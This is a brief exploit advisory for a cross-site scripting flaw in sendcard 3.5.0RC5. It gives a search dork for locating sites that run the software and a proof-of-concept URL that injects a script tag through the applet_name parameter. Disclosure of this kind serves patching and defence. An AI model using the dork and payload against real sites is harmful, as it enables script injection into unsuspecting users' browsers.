sendcard 3.5.0RC5 Cross Site Scripting Vulnerability
-----------------------------------------------------------
foun by :kurdish hackers team
group : kurd-team
contact : pshela@yahoo.com
site : kurdteam.org
-----------------------------------------------------------
------------------------script-----------------------------
-----------------------------------------------------------
script: sendcard 3.5.0RC5
download: http://www.sendcard.org/download.php
-----------------------------------------------------------
Exploit:
--------
Dork:"Powered by sendcard"
Exmple:
-------
/sendcard.php?image33=Submit&image=stars.gif&img_width=500&img_height=600&applet_name=<script>alert(1)</script>
-----------------------------------------------------------
Zryan_kurd ,root-SyS
-----------------------------------------------------------